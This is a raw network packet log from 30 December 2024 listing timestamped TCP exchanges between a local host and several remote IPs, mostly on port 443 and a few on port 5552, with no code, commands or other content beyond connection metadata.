Dec 30, 2024 11:25:36.986618042 CET	443	49912	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.987231970 CET	49924	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.987246990 CET	443	49924	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:36.987540960 CET	49924	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.987899065 CET	49924	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:36.987911940 CET	443	49924	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.134015083 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.134073019 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.134119987 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.134119987 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.134140968 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.134200096 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.134329081 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.140961885 CET	49913	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.140976906 CET	443	49913	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.142050982 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.142117977 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.142168999 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.142838955 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.142853975 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.354465008 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.354600906 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.355413914 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.355479956 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.459270000 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.459393024 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.460061073 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.460119009 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.587171078 CET	443	49924	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.588052988 CET	49924	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.591106892 CET	49930	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:37.596039057 CET	5552	49930	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:37.599381924 CET	49930	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:37.619793892 CET	49930	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:37.624727011 CET	5552	49930	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:37.765304089 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.765351057 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.765688896 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.765798092 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.768454075 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.769181013 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.769198895 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.769480944 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.769907951 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.769907951 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:37.770833969 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.770977974 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.771897078 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.771904945 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.775207996 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.775221109 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.815340996 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.815341949 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:37.856404066 CET	49924	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:37.856488943 CET	443	49924	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:37.856573105 CET	49924	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.054826021 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.054909945 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.054949999 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.054992914 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.055475950 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.055516958 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.055543900 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.055557966 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.055885077 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.055939913 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.055953026 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.056114912 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.056934118 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.056976080 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.056991100 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.057010889 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.067207098 CET	49923	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.067233086 CET	443	49923	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.067382097 CET	49921	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.067392111 CET	443	49921	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.068064928 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.068089962 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.068335056 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.068392992 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.068408012 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.068738937 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.069133043 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.069140911 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.069318056 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.069334984 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.074563980 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.074579000 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.074731112 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.074980974 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.074990034 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.190469027 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.190521002 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.190579891 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.190603971 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.190618992 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.190660000 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.197268963 CET	49925	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.197289944 CET	443	49925	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.197701931 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.197758913 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.197839975 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.198473930 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.198492050 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.673348904 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.673440933 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.690119028 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.690191984 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.695106983 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.695168018 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.717222929 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.717236042 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.717464924 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.717520952 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.718302011 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.722925901 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.722948074 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.725168943 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.725174904 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.725732088 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.725738049 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.725950003 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:38.725954056 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:38.759341955 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.797486067 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.797564983 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.803613901 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.803661108 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.803901911 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:38.803972960 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.804708004 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:38.851339102 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.069158077 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.069221020 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.069257021 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.069349051 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.069924116 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.069962025 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.069984913 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.070015907 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.074861050 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.074913979 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.074924946 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.074964046 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.075846910 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.075887918 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.075894117 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.075926065 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.078479052 CET	49932	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.078509092 CET	443	49932	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.079740047 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.079771042 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.079830885 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.080024004 CET	49933	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.080032110 CET	443	49933	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.080271006 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.080280066 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.080627918 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.080667019 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.080724001 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.080995083 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.081011057 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.152513027 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.152571917 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.152595043 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.152605057 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.152616024 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.152645111 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.152651072 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.152664900 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.152693987 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.152714014 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.154556036 CET	49936	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.154563904 CET	443	49936	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.155169964 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.155210018 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.155267954 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.156205893 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.156222105 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.202845097 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.202903032 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.202958107 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.202981949 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.202992916 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.203017950 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.203025103 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.203062057 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.203064919 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.203108072 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.203967094 CET	49939	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.203983068 CET	443	49939	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.211730003 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.211760044 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.211890936 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.212250948 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.212261915 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.684189081 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.684277058 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.684951067 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.684958935 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.685141087 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.685144901 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.698939085 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.699081898 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.699600935 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.699613094 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.699748039 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:39.699755907 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:39.737252951 CET	5552	49930	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:39.737701893 CET	49930	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:39.776298046 CET	49930	5552	192.168.2.10	172.111.138.100
Dec 30, 2024 11:25:39.781121016 CET	5552	49930	172.111.138.100	192.168.2.10
Dec 30, 2024 11:25:39.782494068 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.783775091 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.784301043 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.784308910 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.786077976 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.786086082 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.810616016 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.810779095 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.811256886 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.811258078 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:39.811264038 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:39.811275959 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.062524080 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.062707901 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.062717915 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.062855005 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.062879086 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.062903881 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.063131094 CET	443	49948	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.063169956 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.063265085 CET	49948	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.067339897 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.067403078 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.067616940 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.067850113 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.067868948 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.071536064 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.071603060 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.071680069 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.071680069 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.071820974 CET	49949	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.071846008 CET	443	49949	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.072386980 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.072407961 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.072556019 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.072844028 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.072854042 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.205358982 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.205404997 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.205449104 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.205470085 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.205509901 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.205509901 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.205526114 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.205823898 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.206861973 CET	49950	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.206890106 CET	443	49950	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.207818031 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.207847118 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.208107948 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.208107948 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.208137035 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.224385977 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.224436998 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.224467993 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.224478960 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.224512100 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.224553108 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.224575043 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.224646091 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.235151052 CET	49951	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.235160112 CET	443	49951	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.251429081 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.251482964 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.251686096 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.252331018 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.252347946 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.672486067 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.672558069 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.673269987 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.673331976 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.685436964 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.685509920 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.686323881 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.686377048 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.811160088 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.813335896 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.871649027 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.872004032 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.983632088 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.983649015 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.983953953 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.984050989 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.985347033 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.987309933 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.987337112 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.987678051 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:40.987994909 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.988892078 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:40.992367029 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.992372990 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.992518902 CET	49962	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.992523909 CET	443	49962	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.997483015 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.997493982 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:40.997622013 CET	49966	443	192.168.2.10	142.250.184.225
Dec 30, 2024 11:25:40.997627020 CET	443	49966	142.250.184.225	192.168.2.10
Dec 30, 2024 11:25:41.027333975 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.031344891 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.265816927 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.266011000 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.266027927 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.266110897 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.266621113 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.266675949 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.266685009 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.266767025 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.267005920 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.267020941 CET	443	49961	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.267043114 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.267066956 CET	49961	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.267798901 CET	49975	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.267838955 CET	443	49975	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.267920971 CET	49975	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.268368959 CET	49975	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.268379927 CET	443	49975	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.278042078 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.278107882 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.278183937 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.278223991 CET	443	49960	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.278301954 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.278301954 CET	49960	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.278892994 CET	49976	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.278917074 CET	443	49976	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.279012918 CET	49976	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.279453993 CET	49976	443	192.168.2.10	216.58.206.46
Dec 30, 2024 11:25:41.279465914 CET	443	49976	216.58.206.46	192.168.2.10
Dec 30, 2024 11:25:41.320004940 CET	443	49962	142.250.184.225	192.168.2.10
